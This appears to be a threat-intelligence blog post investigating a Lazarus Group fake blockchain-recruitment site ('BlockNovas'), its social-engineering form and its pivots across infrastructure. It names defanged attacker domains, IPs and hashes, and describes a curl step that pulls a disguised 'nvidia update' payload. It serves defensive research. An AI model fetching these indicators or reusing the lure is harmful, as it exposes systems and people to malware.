An unstoppable force: Lazarus Group
An unstoppable force: Lazarus Group
A North Korean state-sponsored cyber
threat group known for its recent ByBit hack and sophisticated techniques for
over 10 years, have shown the world that they are not stopping.
Lazarus Group continued their targeting of the cryptocurrency sector with a fake opportunities lure where they could earn over $7000 a month. The victim would be enticed to enter their details such as name, email, location, job interests, salary, LinkedIn and GitHub profiles. This would provide them the necessary information to lock in on their targets and trick them into further malicious attacks. The FBI has seized the main website, but this has not stopped them from spinning up more infrastructure to target employees who work in the cryptocurrency sector.
Threat
Profiles
Using Validin’s Threat Profiles to search
for indicators on Lazarus Group makes it possible to pivot off of any IOC’s
that are reported already on the threat actor. The domain that is investigated
in this report is lunoxbet77rain[.]online which was flagged as Lazarus Group by
Maltrail. Upon further analysis, it was quickly identified that using the
host-banner_0_hash, host-header_hash, meta tags and header titles were not
going to progress the investigation further due to the volume returned because
it was behind a domain generation algorithm (dga) using Cloudflare.
The hash that was pivoted on in this
investigation was the favicon_hash_host, that was located under ‘host
connections’: b68075c8f2aaef80fa70d7c562804f25. This identified another website
(lunoxbet77rain[.]store) that had not yet been flagged as malicious and was
last seen 26-04-2025. The name is similar to other domains that have been
flagged as malicious, in particular the one we were first investigating.
According to Validin it had been seen as far back as 21-11-2024.
Analysis
Further analysis of the website displays a
Cloudflare captcha which is a known technique to filter out the bots and
automated sandboxes.
The web page is using the name ‘BlockNovas’ and is aimed at those
wanting to apply for exciting opportunities in blockchain and crypto. The
application process looks like the below in figure 1 and it is worth noting that the page
directories change:
Figure 1: Users would enter their full name and email address to a fake form
Figure
2: The user would not be able to proceed without confirming the three consent
categories under ‘evaluation and communication purposes’
Figure
3: Depending on what the location was, would decide on the salary amount
offered in the monthly-rate page
Figure
4: This provides Lazarus an indication of what the users role currently is and
if they are a valuable target
Figure
5: There is a typo on this page can you see it?
Figure
6: It asks the user their experience again
Figure
7: This is where the user can input what they wish to earn
Figure
8: It offers a wage higher than the one inputted, but this is the same
regardless of what was inputted between $1000-$5000
Figure
9: Jonny is flexible
Figure
10: Perhaps to test if the user will understand their further communications
Figure 11: This is where it is interesting, it is required to input the LinkedIn profile to proceed, so that they can obtain information about the user and connect.
Figure 12: The next stage is their ‘Technical Assessment Quiz’
Figure: First question in the quiz where the user can enter details to answer the questions
Figure 13: Second question for the user to answer to find more details about them
Figure 14: Last question and uploading your results stating that ‘you will receive an email about the result’.
Figure 15: Proceeds to ask the user to record a video for the next stage which prepares for the payload execution
Figure 16: Informs the user that access to their camera or microphone is blocked and that this solution will help them ‘fix’ it by downloading a nvidia update via curl in the command line. This differs if it identifies the host is on Linux, MacOS or other OS.
Figure 17: If the user clicks off of the pop up, they will see the buttons ‘How to Fix’, ‘Request Camera Access’ and ‘Record Now’ which give them the same instructions as the previous pop up. If they click ‘support team’ it would take them to the Blocknovas website which has now been seized by the FBI.
The dev tools on the web page show that the
form process as shown has a script that looks like this, which means you can
just go to any stage of the form by typing in that directory in the URL:
Within the same script ‘index-x13THEXR.js’ are
API keys, the instructions as well as the curl script and the website that the
script is pulling from (hxxps://api[.]drivercamsupport[.]com/nvidia-rc.update).
Amongst this script there are api keys and another domain mentioned.
Figure 18: hxxps://api[.]drivercamsupport[.]com/nvidia-rc.update and the instructions are highlighted.
Figure
19: Api key located
Figure 20: Mention of a cdn when searching for ‘api’
Thank you to HuntYethHounds for their contribution who managed to locate the victim list from this domain under a directory on their websites. It became apparent that this was relayed across multiple sites in use by them and the data will not be shown on the blog to users who may use this for nefarious purposes.
For the purpose of this blog post, victims are not shown but a full list is available should law enforcement seek it.
Figure 21: What it looks like when the user is downloading the file over command line
Figure
22: It failed due to permission issues within the sandbox, so let's look at the
website it is pulling it from hxxps[://]api[.]drivercamsupport[.]com/nvidia-rc[.]update/6HyIXuN9vYEQ4QC9zY0zCu52GCRtIA50
Upon entering the website it displays a security certificate from *.web-hosting[.]com.
Once past the warning it shows ‘hello world’.
This was potentially where the executable used to be. Using Wayback Machine it
did not capture this website and UrlScan did not have any previous scans of it,
so we cannot see what it used to look like. However, with VirusTotal
(https://www.virustotal.com/gui/file/cafeb3a0523a80e83f54e2b39ec0ce552aa59afce79b032c208ff3e5c59f1533/details)
we can see that the domain
hxxps[://]api[.]drivercamsupport[.]com/nvidia-rc[.]update/6HyIXuN9vYEQ4QC9zY0zCu52GCRtIA50,
has a body SHA-256 which is related to the end of the URL
6HyIXuN9vYEQ4QC9zY0zCu52GCRtIA50. Using the SHA-256
Cafeb3a0523a80e83f54e2b39ec0ce552aa59afce79b032c208ff3e5c59f1533,
we can see that it goes by the following names:
●
6HyIXuN9vYEQ4QC9zY0zCu52GCRtIA50
●
nvidia-rc.update
●
nvidiarc.update
● aTdes8b4zl3XuuzfFtzAUZyjcsJ9zu4t
This is useful as this may suggest that it
used a different name on the URL. Let’s try it out and see what happens:
It worked! However, the next page showed the same message ‘hello world’, even when changing from nvidia-rc.update to nvidiarc.update.
The next step was to just input
‘api.drivercamsupport[.]com’ into the browser, which redirected to
drivereasy[.]com.
Figure 23: Drivereasy website
VirusTotal shows (https://www.virustotal.com/gui/url/3075536a4fdb10c05699c10ee1515798c540ef91f166dcd86539a2543492550d/details)
a final URL of hxxps[://]download[.]drivereasy[.]com/DriverEasy_Setup[.]exe and
the SHA-256: FAE2CDCB8B566128CA110CF9BAD3EB604542603ADD5DE1A3676D6F75078D3F67.
The SHA-256 shows a number of malicious execution parents. For the purpose of
this blog, this will not be investigated further but is another pivot point for
those interested.
Pivot,
Pivot, Pivot!
Another pivot point is the wording in the
preview section of this screenshot:
<!doctype html>.<html
lang="en">. <head>. <meta charset="UTF-8"
/>. <link rel="icon" type="image/svg+xml"
href="/company_logo.png" />. <meta name="viewport"
content="width=device-width, initial-scale=1.0" />.
<title>BlockOvas</title>. <script type="module"
crossorigin src="/assets/index-x13THEXR.js"></script>.
<link rel="stylesheet" crossorigin
href="/assets/index-D8oRlpYC.css">. </head>. <body>.
<div id="root"></div>. </body>.</html>.
NOTE: This shows ‘BlockOvas’ in
their title when the website shows BlockNovas.
Also there is a script ‘/assets/index-x13THEXR.js’.
A search for a lookalike domain under
“BlockOvas” in Validin has returned the following, which has already flagged
them as Lazarus Group and confirms we are tracking Lazarus Group with the
domain we are investigating.
NOTE: The error on this screen grab is to show how you search in the
Lookalike Domain Search feature as it is not always as straightforward as
searching the exact wording of the
header.
Another interesting pivot is utilising a
tool known as Urlscan. Entering the domain into Urlscan shows that there was 1
hit for the same domain 5 months ago and interestingly, it has a directory that
states ‘desktop’. Which can be found here: https://urlscan.io/result/01967364-5746-7103-8a8e-5528c9d29375/related/
Figure
24: Urlscan result
https://urlscan.io/result/798031d0-678c-47c6-bf4a-19cb520c7e8e/
The result of the website shows a
different page to what we are currently seeing which suggests that this was
either once a betting website owned by Lazarus Group or has been taken over by
them. It would be unusual for Lazarus to have used a betting website when they
were targeting cryptocurrency individuals, so further analysis of the timelines
with Validin would confirm when they took over the IP address. This can be done
by checking the PRT and the infrastructure used against the dates.
There are some interesting social media
URLs associated with this website (proceed with caution and consider
operational security if you are to investigate these URLs). A download was seen
in the URL list to an Amazon S3 web page (https://urlscan.io/result/01967369-cc63-7562-a780-97e5fc7a6e90/#redirects),
unfortunately this website shows Access Denied, however the file extension
suggests it was an Android file (apk).
Figure
25: Betting website for lunoxbet77 previously before it was taken over
Figure 26: Urlscan showing social media sites for the betting website that was up before it was the cryptocurrency recruitment page
A Google search of “lunoxbet77” showed a new
domain using ‘.site’ and ‘BlockOvas’; this looks familiar.
Figure 27: A quick look on Validin shows that this site has already been flagged as malicious and belonging to Lazarus Group
If we investigate apply[.]blocknovas[.]com
which is a subdomain of blocknovas[.]com there is a favicon hash IP which shows
as 37.221.126[.]117. When investigating an IP or domain, note the port number
and response date as these can be an indicator of when a threat actor
controlled that IP. In the screenshot we can see that port 3000 was used on
18-03-2025 and 20-03-2025.
Another example of how to group the activities
related to a threat actor using Validin is the IP 203.161.52[.]90 in use by
Lazarus Group. There are changes that show when they used ‘Blocknovas’ and
‘BlockOvas’ at different times. Using ‘Host Connections’ there are 339 results
related to the IP address 203.161.52[.]90 AS 22612 (NAMECHEAP-NET). On
27-02-2025 the host title was darryl-walker[.]com and after this there were
changes to banner hashes, etags, SHA1 and more running up to the domain and
infrastructure change. On 16-04-2025 it was talenthiringexpert[.]com which has
been attributed to Lazarus Group.
Using ‘Host Responses’ on Validin on the IP address 203.161.52[.]90 this is another way to track the infrastructure changes such as when the IP was no longer in use by the previous host. On 27-02-2025, it was used by the darryl-walker[.]com domain on port 80 and 22. However, on 09-03-2025 it was owned by BlockOvas using port 3000 and 4000; port 80 and 22 seem to have no title related to it and a 404 error, which suggests that this was not in use by BlockOvas.
Using the timeline in Validin helps to build
the timeline of when the domain was in use by the group by checking the first
seen against the domain and other entries. This can also aid in validating
which domains were in use by a specific threat actor and when the campaigns
were running.
LinkedIn Member
A search on LinkedIn for ‘Blocknovas’
identifies a number of LinkedIn Members, who work at ‘Blocknovas LLC’ or
‘Blocknovas’. This gives another pivot point to search for ‘Blocknovas LLC’.
Seizure of Blocknovas LLC
A Google search of ‘Blocknovas LLC’ just
became interesting as the website has been seized by the Federal Bureau of
Investigation (FBI). There are further details that include a phone number and
social media records.
Figure
28: Website seized by FBI against North Korean Cyber Actors who utilized this
domain to deceive individuals with fake job postings and distribute malware.
Rapport building
A pivot to the other searches returned has
shown that they were registered on a website called ‘intch[.]org’ under Jean
Abinader and Alexander Nolan. Alexander Nolan’s picture on here is the same as
one of the LinkedIn member’s profile pictures, so we can be sure that they were
active on LinkedIn or there is a possibility they still are. The results that
are shown display how they built up a rapport by having numerous known trusted
websites mention ‘BlockNovas’.
Figure
29: Intch[.]org
Figure 30: Further evidence of Blocknovas building rapport on numerous known websites to gain trust
Blocknovas LLC
After researching Blocknovas, it is now
identified that they also fall under ‘Blocknovas LLC’ and a search on Validin
of this has identified a number of new indicators. ETAG
W/"1dd-1962d18c94c" associated with blocknovas llc has malicious
domains tied to it which may be able to identify further Lazarus Group domains.
The one of interest in
mail[.]blocknovasllc[.]com because this is likely to be their mail server and
Validin has found their host-location which shows
‘/sso/login?url=/webmail/?homepage’.
Figure 31: Mailu-Admin page for Blocknovas llc.
Notice that it has ‘Go To’ on the left hand
side, this is where they take you to their various pages and the ‘Client Setup’
page has information on their incoming and outgoing mail setups:
Figure
32: Incoming mail setup on port 993 IMAP (TLS) with the server name
mail[.]blocknovasllc[.]com
Figure 33: Outgoing mail on port SMTP 465 (TLS) with the server name mail[.]blocknovasllc[.]com
The website option took you to their webpage
and surprisingly it is still up:
Rabbit
Hole 
WINDOWS-DTX-4GB
The IP 172.86.114.170 links back to
apply.blocknovas[.]com and using Censys to search for that domain has
identified a WINRM on port 5985. Within the raw data there is a computer name
WINDOWS-DTX-4GB associated with WINRM on this port. Pivoting on the services.parsed.winrm.ntlm_info.netbios_computer_name="WINDOWS-DTX-4GB"
located from the winrm port 5985 on Censys, has found 37 hosts with that
computer name. They are using ROUTERHOSTING 14956 in the ip range 172.86.114.0/
and 45.61.158.179 using similar infrastructure (WINRM, SMB, DCERPC, CLOUDZY,
ROUTERHOSTING). Using the lookalike feature in Validin has identified domains
with a similar name.
Figure
34: They are slightly different with ‘8gb’ instead of 4gb.
Figure
35: Going to the domains shows this error and the same applies when it is
changed to 4gb.
This may have no correlation to Lazarus Group or this investigation, but it was worth mentioning as this is how deviation from the investigation can happen as well as incidentally creating a bias.
Similarly, a search on lookalike domains comes
up with blacknova[.]cfd which was first seen in 30-03-2025 whose web server is
ready to use. Coincidence?
Figure 36: Web server is ready to use for blacknova[.]cfd
Conclusion
With this research the domain found at the
start of the investigation using Validin, is attributed to Lazarus Group and
that they are still continuing their campaign despite the seizure from the FBI.
The sophistication of Lazarus Group should not be underestimated and caution
must be taken when searching for new opportunities or developing new
connections online. The fake recruitment technique aids Lazarus in building
personas as they obtain responses from individuals to execute further social
engineering techniques. Thorough analysis of the domains behind Cloudflare and
similar providers should try to build a timeline of when the threat actor took
over the IP. Multiple threat actors may use the same IP at different times to
launch their own malicious campaigns. This is why the timeline view in Validin
is crucial to identify which group is using it, rather than attributing the
entirety of malicious domains associated to it with one threat group. Examples
of this are shown to demonstrate how this can happen, such as the betting
website and the rabbit holes that may come from it. Find the infrastructure,
cross-reference it with findings, timeline, validation and threat intelligence
contributes with high confidence attribution.
Guidance from the Internet Crime Complaint Center/FBI (https://www.ic3.gov/PSA/2024/PSA240903):
To lower the risk from North Korea’s advanced
and dynamic social engineering capabilities, the FBI recommends the following
best practices for you or your company:
●
Develop your own unique methods to
verify a contact's identity using separate unconnected communication platforms.
For example, if an initial contact is via a professional networking or
employment website, confirm the contact's request via a live video call on a
different messaging application
●
Do not store information about
cryptocurrency wallets — logins, passwords, wallet IDs, seed phrases, private
keys, etc. — on Internet-connected devices.
●
Avoid taking pre-employment tests
or executing code on company owned laptops or devices. If a pre-employment test
requires code execution, insist on using a virtual machine on a non-company
connected device, or on a device provided by the tester.
●
Require multiple factors of
authentication and approvals from several different unconnected networks prior
to any movement of your company's financial assets. Regularly rotate and
perform security checks on devices and networks involved in this authentication
and approval process.
●
Limit access to sensitive network
documentation, business or product development pipelines, and company code
repositories.
●
Funnel business communications to
closed platforms and require authentication — ideally in person — before adding
anyone to the internal platform. Regularly reauthenticate employees not seen in
person.
●
For companies with access to large
quantities of cryptocurrency, the FBI recommends blocking devices connected to
the company’s network from downloading or executing files except specific
whitelisted programs and disabling email attachments by default.
Additional
resources:
https://www.ic3.gov/PSA/2024/PSA240903
https://x.com/teamcymru_S2/status/1915827990774063179?t=oyqgcY3JdHoDQ-4wa4RRJw&s=19